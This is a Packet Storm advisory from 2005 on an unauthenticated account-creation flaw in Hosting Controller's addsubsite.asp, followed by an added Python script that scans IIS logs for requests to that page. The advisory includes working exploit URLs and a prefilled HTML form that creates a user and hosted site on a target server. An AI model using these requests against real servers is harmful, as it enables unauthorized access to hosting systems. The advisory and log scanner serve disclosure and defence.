hosting061.txt

2005-05-27T00:00:00
ID PACKETSTORM:37296
Type packetstorm
Reporter Packet Storm
Modified 2005-05-27T00:00:00

Description

                                        
                                            `Advisory Information  
-------------------------  
Software Package : Hosting Controller  
Vendor Homepage : http://www.hostingcontroller.com  
Platforms : Windows based servers  
Vulnerability : Unauthenticated user registration  
Risk : High!  
Vulnerable Versions: All versions (tested on: v.6.1 Hotfix 1.9)  
Vendor Contacted : 5/3/2005  
Release Date : 5/5/2005  
  
Summary  
------------  
Hosting Controller is a complete array of Web hosting automation tools for  
the Windows Server family platform.  
The vulnerability is in admin/hosting/addsubsite.asp, which can be requested  
without authentication. An attacker can create a user and a host on the target system.  
  
Exploit  
---------  
A demonstration exploit URL is provided:  
  
http://[target]/admin/hosting/addsubsite.asp?loginname=Mouse&password=123456  
http://[target]:8077/hosting/addsubsite.asp?loginname=Mouse&password=123456  
  
<FORM action="http://[target]/admin/hosting/addsubsite.asp" method="post">  
<INPUT type="hidden" name="reseller" value="resadmin" id="reseller" >  
<INPUT type="hidden" name="domaintypecheck" value="SECOND" id="Hidden1">  
Domain: <INPUT name="DomainName" value="shabgard.org" id="Hidden2"><BR>  
Username: <INPUT name="loginname" value="Mouse" id="Hidden3"><BR>  
<INPUT type="hidden" name="Quota" value="-1" id="Hidden4">  
<INPUT type="hidden" name="htype" value="27" id="htype" >  
<INPUT type="hidden" name="choice" value="1" id="Hidden7" >  
<INPUT type="hidden" name="mailaccess" value="TRUE" id="Hidden5">  
Mailserver: <INPUT name="MailServerType" value="IMail" id="Hidden6"><BR>  
Password: <INPUT name="password" value="123456" id="Hidden8"><BR><BR>  
<input type="submit" value="Make"><BR>  
</FORM>  
  
`
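For defenders reviewing IIS logs on a Hosting Controller server, the following added example (not part of the original advisory) scans W3C extended logs for requests to the addsubsite.asp endpoint named above. The log field layout, the sample lines and the `cold_hit` heuristic are assumptions constructed for illustration.

```python
from urllib.parse import parse_qs

TARGET = "/hosting/addsubsite.asp"         # path suffix shared by both advisory URLs
CREATE_PARAMS = {"loginname", "password"}  # parameters in the advisory's demo URLs

# Constructed sample in IIS W3C extended format (field order is an assumption).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query s-port sc-status
2005-05-06 10:01:02 192.0.2.10 GET /admin/default.asp - 80 200
2005-05-06 10:01:40 192.0.2.10 POST /admin/hosting/addsubsite.asp - 80 200
2005-05-06 11:15:09 198.51.100.7 GET /admin/hosting/AddSubSite.asp loginname=a&password=b 80 200
2005-05-06 11:15:30 198.51.100.7 GET /hosting/addsubsite.asp loginname=a&password=b 8077 200
2005-05-06 11:16:00 203.0.113.5 GET /admin/hosting/addsubsite.asp - 80 404
"""

def find_addsubsite_hits(log_text):
    """Return one record per logged request to addsubsite.asp."""
    fields, seen_clients, hits = [], set(), []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]          # column names for the rows that follow
            continue
        values = line.split()
        if line.startswith("#") or not fields or len(values) != len(fields):
            continue                           # directive, blank or truncated row
        row = dict(zip(fields, values))
        client = row.get("c-ip", "-")
        # IIS treats paths case-insensitively, so compare in lower case.
        if row.get("cs-uri-stem", "").lower().endswith(TARGET):
            query = row.get("cs-uri-query", "-")
            params = {p.lower() for p in parse_qs(query, keep_blank_values=True)}
            hits.append({
                "time": f'{row.get("date", "")} {row.get("time", "")}',
                "client": client,
                "port": row.get("s-port", ""),
                "status": row.get("sc-status", ""),
                "creds_in_query": CREATE_PARAMS <= params,
                # No earlier request from this client in the log: the page was
                # reached directly. POST bodies are not logged by IIS, so for
                # the form variant this is the main signal.
                "cold_hit": client not in seen_clients,
            })
        seen_clients.add(client)
    return hits

def suspicious(hits):
    """Successful (2xx) hits with credentials in the URL or no prior activity."""
    return [h for h in hits if h["status"].startswith("2")
            and (h["creds_in_query"] or h["cold_hit"])]
```

Each flagged record should be cross-checked against the panel's user and site list for accounts created at that time.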